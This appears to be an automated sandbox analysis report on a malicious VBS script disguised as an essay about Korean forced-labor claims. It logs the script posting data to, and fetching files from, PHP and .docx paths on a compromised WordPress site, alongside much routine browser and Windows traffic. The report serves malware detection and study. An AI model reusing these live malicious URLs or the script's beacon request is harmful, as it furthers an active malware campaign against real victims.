Windows Analysis Report
Essay on Resolution of Korean Forced Labor Claims.vbs

Potential malicious VBS script found (has network functionality)

Source:	Initial file: Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
Source:	Initial file: Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx HTTP/1.1Host: makeoversalon.net.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: makeoversalon.net.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cookieimg.php HTTP/1.1Host: admin.bitninja.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://makeoversalon.net.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cookieimg.php HTTP/1.1Host: admin.bitninja.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&gjid=287345157&_gid=1937593962.1713594250&_u=YEBAAUAAAAAAACAAI~&z=981243278 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&_u=YEBAAUAAAAAAACAAI~&z=711350274 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://makeoversalon.net.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&_u=YEBAAUAAAAAAACAAI~&z=711350274 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/bg/rIjZlM8ZNfOeVQTojtt5OPuY9YnE0CAT82tG0V-YUX0.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://recaptcha.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=htoAzWVomMrkLpL&MD=Ye3Vu7rv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=htoAzWVomMrkLpL&MD=Ye3Vu7rv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: chromecache_58.7.dr, chromecache_66.7.dr

String found in binary or memory: return b}vC.H="internal.enableAutoEventOnTimer";var dc=ia(["data-gtm-yt-inspected-"]),xC=["www.youtube.com","www.youtube-nocookie.com"],yC,zC=!1; equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: makeoversalon.net.in

Source: unknown

HTTP traffic detected: POST /wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedAccept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: makeoversalon.net.inContent-Length: 3991Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Sat, 20 Apr 2024 06:24:03 GMTContent-Length: 13791Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Sat, 20 Apr 2024 06:24:04 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Sat, 20 Apr 2024 06:24:04 GMTContent-Length: 13781Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Sat, 20 Apr 2024 06:24:05 GMTContent-Length: 45221Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Sat, 20 Apr 2024 06:24:08 GMTContent-Length: 45225Connection: close

Source: wscript.exe, 00000000.00000003.1756157743.0000022AC66E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758731467.000000E2A20F9000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756206708.0000022AC5CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757741056.0000022AC5E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://admin.bitninja.io/cookieimg.php
Source: chromecache_58.7.dr	String found in binary or memory: https://adservice.google.com/pagead/regclk
Source: chromecache_58.7.dr	String found in binary or memory: https://adservice.googlesyndication.com/pagead/regclk
Source: chromecache_61.7.dr	String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: wscript.exe, 00000000.00000003.1742392823.0000022AC5D1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758237969.0000022AC5D17000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742879491.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742572781.0000022AC5D17000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742392823.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757757779.0000022AC5E45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743103250.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756206708.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitninja.io
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: wscript.exe, 00000000.00000002.1759178536.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757521098.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1760015537.0000022AC6680000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757235721.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/
Source: wscript.exe, 00000000.00000002.1759178536.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757521098.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757235721.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/RL-
Source: wscript.exe, 00000000.00000002.1759807591.0000022AC5CE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756381491.0000022AC5CDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/uage:
Source: wscript.exe, 00000000.00000002.1759472586.0000022AC3E39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743103250.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758636562.0000022AC5A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-im
Source: wscript.exe, 00000000.00000003.1694351636.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759344841.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp, Essay on Resolution of Korean Forced Labor Claims.vbs	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
Source: wscript.exe, 00000000.00000003.1756695458.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759344841.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.phpT
Source: wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742695487.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.phpj6
Source: wscript.exe, 00000000.00000003.1756695458.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759344841.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.phpw
Source: wscript.exe, 00000000.00000003.1694351636.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp, Essay on Resolution of Korean Forced Labor Claims.vbs	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
Source: wscript.exe, 00000000.00000002.1760015537.0000022AC6680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php1y
Source: wscript.exe, 00000000.00000003.1693830385.0000022AC5A3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php33
Source: wscript.exe, 00000000.00000003.1757757779.0000022AC5E45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php4aZF$
Source: wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.phpY8
Source: wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.phpe?
Source: wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.phpq8
Source: explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, Essay on Resolution of Korean Forced Labor Claims.vbs	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
Source: explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx(eK3
Source: explorer.exe, 00000004.00000003.2300805746.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2301140793.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxD
Source: explorer.exe, 00000004.00000003.2300805746.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2301140793.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxH
Source: explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxPe
Source: explorer.exe, 00000004.00000002.2301180539.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2300646799.0000000000B85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxV
Source: explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxd
Source: explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxll
Source: explorer.exe, 00000004.00000002.2301180539.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2300646799.0000000000B85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxp
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_62.7.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_62.7.dr	String found in binary or memory: https://recaptcha.net
Source: wscript.exe, 00000000.00000003.1757741056.0000022AC5E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/api.js
Source: chromecache_67.7.dr	String found in binary or memory: https://recaptcha.net/recaptcha/api2/
Source: chromecache_58.7.dr	String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_58.7.dr	String found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
Source: chromecache_61.7.dr	String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: chromecache_62.7.dr	String found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_61.7.dr	String found in binary or memory: https://tagassistant.google.com/
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://td.doubleclick.net
Source: chromecache_66.7.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: chromecache_61.7.dr	String found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
Source: chromecache_61.7.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: chromecache_61.7.dr	String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://www.google.com
Source: chromecache_61.7.dr	String found in binary or memory: https://www.google.com/ads/ga-audiences
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://www.googleadservices.com
Source: chromecache_58.7.dr, chromecache_66.7.dr	String found in binary or memory: https://www.googletagmanager.com
Source: chromecache_61.7.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: wscript.exe, 00000000.00000003.1757757779.0000022AC5E45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-1975075-20
Source: chromecache_57.7.dr, chromecache_62.7.dr	String found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__.
Source: chromecache_56.7.dr, chromecache_67.7.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js
Source: chromecache_58.7.dr	String found in binary or memory: https://www.merchant-center-analytics.goog

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
